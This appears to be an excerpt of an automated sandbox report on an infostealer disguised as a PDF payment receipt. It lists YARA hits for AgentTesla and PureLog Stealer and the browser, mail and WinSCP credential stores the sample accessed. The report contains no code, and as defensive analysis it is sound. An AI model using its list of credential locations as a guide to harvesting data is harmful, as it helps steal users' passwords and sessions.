                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Users\user\AppData\Roaming\repeat\repeat.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Users\user\AppData\Roaming\repeat\repeat.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Users\user\AppData\Roaming\Reramvw.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Users\user\AppData\Roaming\Reramvw.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Users\user\AppData\Roaming\repeat\repeat.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Users\user\AppData\Roaming\repeat\repeat.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Yara detected AgentTesla
                            Source: Yara matchFile source: 6.2.Reramvw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.31afa1c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000002.2331974047.000000000334A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.3213952954.000000000311A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.3214735733.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.3214735733.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.3215330801.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2331974047.000000000331E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2408937601.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.3213952954.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.3213952954.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2328135287.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.3215330801.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3213471421.000000000305E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2326420531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3213471421.000000000308A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2233090518.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.3214735733.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2152875189.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2331974047.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.3215330801.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3213471421.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: JUSTIFICANTE DE PAGO CF.pdf.exe PID: 2360, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: JUSTIFICANTE DE PAGO CF.pdf.exe PID: 7164, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 7128, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6300, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 7056, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 5292, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6472, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6152, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 6844, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 2360, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.6430000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.41895b0.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.6430000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.41895b0.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2408937601.000000000288F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1994246590.0000000006430000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2152875189.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2233090518.000000000296E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2328135287.000000000256E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2233090518.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992695119.0000000004172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2328135287.000000000276F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: JUSTIFICANTE DE PAGO CF.pdf.exe PID: 2360, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 7128, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 7056, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6472, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 6844, type: MEMORYSTR
                            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Tries to steal Mail credentials (via file / registry access)
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                            Source: Yara matchFile source: 6.2.Reramvw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.31afa1c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000002.2408937601.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2328135287.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2326420531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2233090518.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.3214735733.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2152875189.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2331974047.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.3215330801.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3213471421.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: JUSTIFICANTE DE PAGO CF.pdf.exe PID: 2360, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: JUSTIFICANTE DE PAGO CF.pdf.exe PID: 7164, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 7128, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6300, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 7056, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 5292, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6472, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6152, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 6844, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 2360, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected AgentTesla
                            Source: Yara matchFile source: 6.2.Reramvw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.31afa1c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000002.2331974047.000000000334A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.3213952954.000000000311A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.3214735733.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.3214735733.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.3215330801.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2331974047.000000000331E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2408937601.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.3213952954.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.3213952954.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2328135287.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.3215330801.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3213471421.000000000305E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2326420531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3213471421.000000000308A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2233090518.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.3214735733.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2152875189.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2331974047.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.3215330801.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.3213471421.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: JUSTIFICANTE DE PAGO CF.pdf.exe PID: 2360, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: JUSTIFICANTE DE PAGO CF.pdf.exe PID: 7164, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 7128, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6300, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 7056, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 5292, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6472, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Reramvw.exe PID: 6152, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 6844, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: repeat.exe PID: 2360, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.6430000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.41895b0.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.6430000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.41895b0.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2408937601.000000000288F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1994246590.0000000006430000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2152875189.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2233090518.000000000296E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2328135287.000000000256E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.2233090518.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992695119.0000000004172000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.2328135287.000000000276F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: JUSTIFICANTE DE PAGO CF.pdf.exe PID: 2360, type: MEMORYSTR
